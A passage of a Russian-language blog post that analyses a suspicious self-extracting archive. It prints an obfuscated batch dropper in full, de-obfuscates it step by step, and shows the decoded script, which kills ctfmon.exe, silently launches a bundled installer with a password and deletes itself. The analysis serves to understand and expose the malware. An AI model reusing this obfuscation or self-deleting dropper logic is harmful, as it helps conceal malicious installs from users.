\u0441\u0430\u043c\u043e\u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u044e\u0449\u0438\u0439\u0441\u044f \u0430\u0440\u0445\u0438\u0432. \u0414\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u044f \u043e\u0442\u043a\u0440\u044b\u043b \u0435\u0433\u043e \u043a\u0430\u043a \u0430\u0440\u0445\u0438\u0432: \u043d\u0443 \u0442\u0430\u043a \u0438 \u0435\u0441\u0442\u044c \u2014 \u0432\u043d\u0443\u0442\u0440\u0438 \u0434\u0432\u0430 \u0444\u0430\u0439\u043b\u0430: t10.bat \u0438 poi.exe. \u0412\u044b\u0442\u0430\u0449\u0438\u0432 \u0438\u0437 \u0430\u0440\u0445\u0438\u0432\u0430 t10.bat \u044f \u0440\u0435\u0448\u0438\u043b \u0435\u0433\u043e \u043f\u043e\u0438\u0437\u0443\u0447\u0430\u0442\u044c: \u043d\u043e \u043d\u0435 \u0442\u0443\u0442-\u0442\u043e \u0431\u044b\u043b\u043e! \u0422\u0430\u043a\u043e\u0433\u043e \u0432\u0438\u0434\u0435\u0442\u044c \u043c\u043d\u0435 \u0435\u0449\u0451 \u043d\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c.<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0412\u043d\u0443\u0442\u0440\u0438 t10.bat \u0431\u044b\u043b\u043e \u0432\u043e\u0442 \u044d\u0442\u043e.<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"dos\">set iDVrlM=set %iDVrlM% pGJV= %iDVrlM%%pGJV%lVOMlhijX== %iDVrlM%%pGJV%GcayqJj%lVOMlhijX%{ %iDVrlM%%pGJV%DysQd%lVOMlhijX%i %iDVrlM%%pGJV%zSdh%lVOMlhijX%0 %iDVrlM%%pGJV%IyEwFH%lVOMlhijX%W %iDVrlM%%pGJV%wgHafh%lVOMlhijX%d %iDVrlM%%pGJV%EyadtMp%lVOMlhijX%f %iDVrlM%%pGJV%ipCNKA%lVOMlhijX%5 %iDVrlM%%pGJV%QYFaxm%lVOMlhijX%* %iDVrlM%%pGJV%VTlcnvcrw%lVOMlhijX%] %iDVrlM%%pGJV%rirX%lVOMlhijX%M %iDVrlM%%pGJV%iKwg%lVOMlhijX%_ %iDVrlM%%pGJV%RASAyUS%lVOMlhijX%? %iDVrlM%%pGJV%heoAiQ%lVOMlhijX%g %iDVrlM%%pGJV%uMCoFRy%lVOMlhijX%\/ %iDVrlM%%pGJV%hxUEB%lVOMlhijX%$ %iDVrlM%%pGJV%JzIoznwCO%lVOMlhijX%v %iDVrlM%%pGJV%dbqUTP%lVOMlhijX%! %iDVrlM%%pGJV%KepbD%lVOMlhijX%# %iDVrlM%%pGJV%LXEX%lVOMlhijX%s %iDVrlM%%pGJV%LpfBjM%lVOMlhijX%@ %iDVrlM%%pGJV%UahIVhihw%lVOMlhijX%I %iDVrlM%%pGJV%uCYMaI%lVOMlhijX%- %iDVrlM%%pGJV%vmit%lVOMlhijX%D %iDVrlM%%pGJV%MCWbFLDjD%lVOMlhijX%E %iDVrlM%%pGJV%knPXvDj%lVOMlhijX%7 %iDVrlM%%pGJV%YEhMVMG%lVOMlhijX%; %iDVrlM%%pGJV%wTULRTl%lVOMlhijX%1 %iDVrlM%%pGJV%Jrjse%lVOMlhijX%q %iDVrlM%%pGJV%NDAI%lVOMlhijX%x %iDVrlM%%pGJV%lUEuKBc%lVOMlhijX%U %iDVrlM%%pGJV%HriWu%lVOMlhijX%8 %iDVrlM%%pGJV%VMaInwUi%lVOMlhijX%w %iDVrlM%%pGJV%KrGSTTdN%lVOMlhijX%9 %iDVrlM%%pGJV%XokcwjROA%lVOMlhijX%\\ %iDVrlM%%pGJV%DdlJvxpBT%lVOMlhijX%y %iDVrlM%%pGJV%LVicuKuUF%lVOMlhijX%F %iDVrlM%%pGJV%hnydIrGM%lVOMlhijX%B %iDVrlM%%pGJV%RXvHWsxrp%lVOMlhijX%4 %iDVrlM%%pGJV%dIYiPoN%lVOMlhijX%} %iDVrlM%%pGJV%ukXME%lVOMlhijX%+ %iDVrlM%%pGJV%gWSgSMYA%lVOMlhijX%T %iDVrlM%%pGJV%IYBhtEnG%lVOMlhijX%e %iDVrlM%%pGJV%yBLVgYi%lVOMlhijX%N %iDVrlM%%pGJV%YYRSUQ%lVOMlhijX%z %iDVrlM%%pGJV%UbHph%lVOMlhijX%P %iDVrlM%%pGJV%fTsricQFz%lVOMlhijX%k %iDVrlM%%pGJV%gkNnIB%lVOMlhijX%2 %iDVrlM%%pGJV%ztzbgDRjB%lVOMlhijX%j %iDVrlM%%pGJV%TMmw%lVOMlhijX%n %iDVrlM%%pGJV%bFpwLXPA%lVOMlhijX%p %iDVrlM%%pGJV%UjcGDFmD%lVOMlhijX%a %iDVrlM%%pGJV%ydOvR%lVOMlhijX%Y %iDVrlM%%pGJV%cpwfdcVIC%lVOMlhijX%&quot; %iDVrlM%%pGJV%sIMODTo%lVOMlhijX%) %iDVrlM%%pGJV%reSQtdOC%lVOMlhijX%[ %iDVrlM%%pGJV%LnzWsIe%lVOMlhijX%6 %iDVrlM%%pGJV%gJBfV%lVOMlhijX%L %iDVrlM%%pGJV%XmuWmdma%lVOMlhijX%. %iDVrlM%%pGJV%sAGBcVq%lVOMlhijX%h %iDVrlM%%pGJV%GmXLXKBWD%lVOMlhijX%O %iDVrlM%%pGJV%CwxeyCrE%lVOMlhijX%t %iDVrlM%%pGJV%mmTzf%lVOMlhijX%l %iDVrlM%%pGJV%aTVdF%lVOMlhijX%r %iDVrlM%%pGJV%ILOSfqlmf%lVOMlhijX%Z %iDVrlM%%pGJV%WsGmIpaah%lVOMlhijX%R %iDVrlM%%pGJV%yJgKHTGjV%lVOMlhijX%C %iDVrlM%%pGJV%TPqwMwH%lVOMlhijX%Q %iDVrlM%%pGJV%hJJAtBUgr%lVOMlhijX%H %iDVrlM%%pGJV%hHpkv%lVOMlhijX%m %iDVrlM%%pGJV%wlLk%lVOMlhijX%b %iDVrlM%%pGJV%hlbFW%lVOMlhijX%, %iDVrlM%%pGJV%cGSDDWyd%lVOMlhijX%X %iDVrlM%%pGJV%phqNn%lVOMlhijX%J %iDVrlM%%pGJV%fPbur%lVOMlhijX%S %iDVrlM%%pGJV%eOigMGv%lVOMlhijX%u %iDVrlM%%pGJV%CbAKNK%lVOMlhijX%K %iDVrlM%%pGJV%IWaff%lVOMlhijX%3 %iDVrlM%%pGJV%sccH%lVOMlhijX%c %iDVrlM%%pGJV%PoATNXt%lVOMlhijX%o %iDVrlM%%pGJV%tdMSJfDrF%lVOMlhijX%V %iDVrlM%%pGJV%ITymyoQK%lVOMlhijX%: %iDVrlM%%pGJV%eaOFc%lVOMlhijX%G %iDVrlM%%pGJV%Bucwql%lVOMlhijX%A %iDVrlM%%pGJV%lcDFKx%lVOMlhijX%( %LpfBjM%%MCWbFLDjD%%sccH%%sAGBcVq%%PoATNXt%%pGJV%%GmXLXKBWD%%EyadtMp%%EyadtMp% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%uCYMaI%%TMmw%%pGJV%%gkNnIB%%pGJV%%heoAiQ%%PoATNXt%%PoATNXt%%heoAiQ%%mmTzf%%IYBhtEnG%%XmuWmdma%%sccH%%PoATNXt%%hHpkv%|%LVicuKuUF%%DysQd%%TMmw%%wgHafh%%pGJV%%uMCoFRy%%UahIVhihw%%pGJV%%cpwfdcVIC%%gWSgSMYA%%gWSgSMYA%%gJBfV%%lVOMlhijX%%cpwfdcVIC%||%heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%TMmw%%IYBhtEnG%%NDAI%%CwxeyCrE%%pGJV% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG%%pGJV%%uMCoFRy%%JzIoznwCO%%IYBhtEnG%%aTVdF%%DdlJvxpBT%%LXEX%%DysQd%%mmTzf%%IYBhtEnG%%TMmw%%CwxeyCrE%%pGJV%%uMCoFRy%%UbHph%%UjcGDFmD%%LXEX%%LXEX%%VMaInwUi%%PoATNXt%%aTVdF%%wgHafh%%lVOMlhijX%%IWaff%%RXvHWsxrp%%ipCNKA%%RXvHWsxrp%%LnzWsIe%%ipCNKA%%wTULRTl%%gkNnIB%%gkNnIB%%IWaff%%RXvHWsxrp%%ipCNKA% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%mmTzf%%PoATNXt%%sccH%%UjcGDFmD%%mmTzf%%sAGBcVq%%PoATNXt%%LXEX%%CwxeyCrE%%pGJV%%uCYMaI%%wTULRTl%%zSdh% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%&gt;%pGJV%%TMmw%%eOigMGv%%mmTzf% %heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%wTULRTl% :next %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%&gt;%pGJV%%TMmw%%eOigMGv%%mmTzf% :1 %MCWbFLDjD%%NDAI%%DysQd%%CwxeyCrE%%pGJV% <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u041f\u043e\u0445\u043e\u0434\u0438\u043b\u043e \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u0442\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u043e\u0442 \u0410\u043b\u0435\u043a\u0441\u0430 \u042e\u0441\u0442\u0430\u0441\u0443. \u041f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c\u0441\u044f.<\/p>\n<p>  \u041f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439 \u0448\u043b\u043e:  <\/p>\n<pre><code class=\"dos\">set iDVrlM=set <\/code><\/pre>\n<p>  \u042f\u0441\u043d\u043e, \u0447\u0442\u043e \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 &#8216;%iDVrlM%&#8217; \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0430 &#8216;set&#8217;. \u0421\u043a\u0430\u0437\u0430\u043d\u043e \u2014 \u0441\u0434\u0435\u043b\u0430\u043d\u043e:  <\/p>\n<pre><code class=\"dos\">set iDVrlM=set set pGJV= set%pGJV%lVOMlhijX== set%pGJV%GcayqJj%lVOMlhijX%{ ...\u043d\u0443 \u0438 \u0442\u0430\u043a \u0434\u0430\u043b\u0435\u0435: \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0438\u0430\u043b\u044c\u043d\u043e. <\/code><\/pre>\n<p>  \u0422\u0435\u043f\u0435\u0440\u044c \u0432\u0442\u043e\u0440\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u0441\u0442\u0430\u043b\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043f\u043e-\u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u043a\u0438. \u041f\u043e\u0441\u043b\u0435 \u0437\u043d\u0430\u043a\u0430 \u0440\u0430\u0432\u043d\u043e \u0432 \u043d\u0435\u0439 \u0441\u0442\u043e\u0438\u0442 \u043f\u0440\u043e\u0431\u0435\u043b (\u0437\u0434\u0435\u0441\u044c \u043d\u0430 \u043a\u043e\u0434\u0435 \u044d\u0442\u043e\u0433\u043e \u043d\u0435 \u0432\u0438\u0434\u043d\u043e). \u041f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 &#8216;%pGJV%&#8217; \u043d\u0430 \u043f\u0440\u043e\u0431\u0435\u043b:  <\/p>\n<pre><code class=\"dos\">set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj%lVOMlhijX%{ set DysQd%lVOMlhijX%i ...\u043d\u0443 \u0438 \u0442\u0430\u043a \u0434\u0430\u043b\u0435\u0435: \u043e\u043f\u044f\u0442\u044c \u0436\u0435 \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0438\u0430\u043b\u044c\u043d\u043e. <\/code><\/pre>\n<p>  \u0418\u0434\u0451\u043c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0440\u0435\u0442\u044c\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u043d\u0430\u043c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 &#8216;%lVOMlhijX%&#8217; \u043d\u0430 \u0437\u043d\u0430\u043a \u0440\u0430\u0432\u0435\u043d\u0441\u0442\u0432\u0430:<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0437\u0430\u043c\u0435\u043d\u044b<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"dos\">set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj={ set DysQd=i set zSdh=0 set IyEwFH=W set wgHafh=d set EyadtMp=f set ipCNKA=5 set QYFaxm=* set VTlcnvcrw=] set rirX=M set iKwg=_ set RASAyUS=? set heoAiQ=g set uMCoFRy=\/ set hxUEB=$ set JzIoznwCO=v set dbqUTP=! set KepbD=# set LXEX=s set LpfBjM=@ set UahIVhihw=I set uCYMaI=- set vmit=D set MCWbFLDjD=E set knPXvDj=7 set YEhMVMG=; set wTULRTl=1 set Jrjse=q set NDAI=x set lUEuKBc=U set HriWu=8 set VMaInwUi=w set KrGSTTdN=9 set XokcwjROA=\\ set DdlJvxpBT=y set LVicuKuUF=F set hnydIrGM=B set RXvHWsxrp=4 set dIYiPoN=} set ukXME=+ set gWSgSMYA=T set IYBhtEnG=e set yBLVgYi=N set YYRSUQ=z set UbHph=P set fTsricQFz=k set gkNnIB=2 set ztzbgDRjB=j set TMmw=n set bFpwLXPA=p set UjcGDFmD=a set ydOvR=Y set cpwfdcVIC=&quot; set sIMODTo=) set reSQtdOC=[ set LnzWsIe=6 set gJBfV=L set XmuWmdma=. set sAGBcVq=h set GmXLXKBWD=O set CwxeyCrE=t set mmTzf=l set aTVdF=r set ILOSfqlmf=Z set WsGmIpaah=R set yJgKHTGjV=C set TPqwMwH=Q set hJJAtBUgr=H set hHpkv=m set wlLk=b set hlbFW=, set cGSDDWyd=X set phqNn=J set fPbur=S set eOigMGv=u set CbAKNK=K set IWaff=3 set sccH=c set PoATNXt=o set tdMSJfDrF=V set ITymyoQK=: set eaOFc=G set Bucwql=A set lcDFKx=( ... <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u041d\u0443 \u0432\u043e\u0442, \u0442\u0435\u043f\u0435\u0440\u044c \u043e\u0442\u043a\u0440\u044b\u043b\u0441\u044f \u0432\u0435\u0441\u044c \u0430\u043b\u0444\u0430\u0432\u0438\u0442 \u0437\u0430\u043c\u0435\u043d\u044b. \u041f\u043e\u0442\u0440\u0430\u0442\u0438\u0432 \u0435\u0449\u0451 \u043c\u0438\u043d\u0443\u0442 15, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043e\u0433\u043e \u0438 HEX-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u043e\u0432 \u044f \u0437\u0430\u043c\u0435\u043d\u0438\u043b \u0432\u0441\u0435 %\u0441\u0442\u0440\u043e\u043a\u0438% \u043d\u0430 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0438\u043c \u0441\u0438\u043c\u0432\u043e\u043b\u044b \u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0441\u044f \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 bat-\u0444\u0430\u0439\u043b:  <\/p>\n<pre><code class=\"dos\">@Echo Off ping -n 2 google.com|Find \/I &quot;TTL=&quot;||goto next taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe poi.exe \/verysilent \/Password=345465122345 ping localhost -10 del %0 &gt; nul goto 1 :next del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del %0 &gt; nul :1 Exit <\/code><\/pre>\n<p>  \u0421\u0443\u0442\u044c bat-\u0444\u0430\u0439\u043b\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u0435\u0441\u044c\u043c\u0430 \u043d\u0435\u0437\u0430\u043c\u044b\u0441\u043b\u043e\u0432\u0430\u0442\u043e\u0439: \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0438\u043d\u0433\u0430 google.com \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u043e\u043c. \u0415\u0441\u043b\u0438 \u0441\u0432\u044f\u0437\u0438 \u043d\u0435\u0442 \u2014 poi.exe \u0443\u0434\u0430\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u0441\u0430\u043c\u0438\u043c bat-\u0444\u0430\u0439\u043b\u043e\u043c \u0438 \u043d\u0430 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f. \u0415\u0441\u043b\u0438 \u0436\u0435 \u0441\u0432\u044f\u0437\u044c \u0435\u0441\u0442\u044c, \u0442\u043e \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441 ctfmon.exe, \u043f\u043e\u0442\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f poi.exe \u0441 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u00abverysilent\u00bb \u0438 \u00abPassword=345465122345\u00bb \u0438 \u043f\u043e\u0442\u043e\u043c \u0441\u0430\u043c\u043e\u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0435\u0442\u0441\u044f bat-\u0444\u0430\u0439\u043b.<\/p>\n<p>  \u041c\u043d\u0435 \u0442\u0430\u043a \u0438 \u043e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u043d\u0435\u044f\u0441\u043d\u044b\u043c \u0434\u0432\u0430 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u2014 \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u00abping localhost -10\u00bb \u0438 \u043a \u0447\u0435\u043c\u0443 \u044d\u0442\u0438 \u043c\u043d\u043e\u0433\u043e\u043a\u0440\u0430\u0442\u043d\u044b\u0435 \u043f\u043e\u0432\u0442\u043e\u0440\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 taskkill \u0438 del?<\/p>\n<p>  \u041d\u0443 \u0434\u0430 \u043b\u0430\u0434\u043d\u043e. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u044f \u043f\u0440\u0438\u043d\u044f\u043b\u0441\u044f \u0437\u0430 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 poi.exe. \u041f\u043e\u043f\u044b\u0442\u043a\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0435\u0433\u043e \u043a\u0430\u043a \u0430\u0440\u0445\u0438\u0432 \u0437\u0430\u0432\u0435\u0440\u0448\u0438\u043b\u0430\u0441\u044c \u043d\u0435\u0443\u0434\u0430\u0447\u0435\u0439. \u041e\u0434\u043d\u0430\u043a\u043e \u0437\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u0441 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u2014 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0432\u0438\u0440\u0443\u0441\u0430 (\u043a\u0430\u043a \u043c\u043d\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c). \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043e\u0431\u0440\u0430\u0442\u0438\u043b\u0441\u044f \u043a \u043a\u043b\u0430\u0434\u0435\u0437\u0438 \u0437\u043d\u0430\u043d\u0438\u0439 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0438 \u043f\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c \u0441\u043b\u043e\u0432\u0430\u043c \u00abverysilent\u00bb \u0438 \u00abPassword\u00bb \u0441\u0440\u0430\u0437\u0443 \u043d\u0430\u0448\u0451\u043b \u0438\u0441\u043a\u043e\u043c\u043e\u0435: <a href=\"http:\/\/jrsoftware.org\/isinfo.php\">Inno Setup is a free installer for Windows programs<\/a>.<\/p>\n<p>  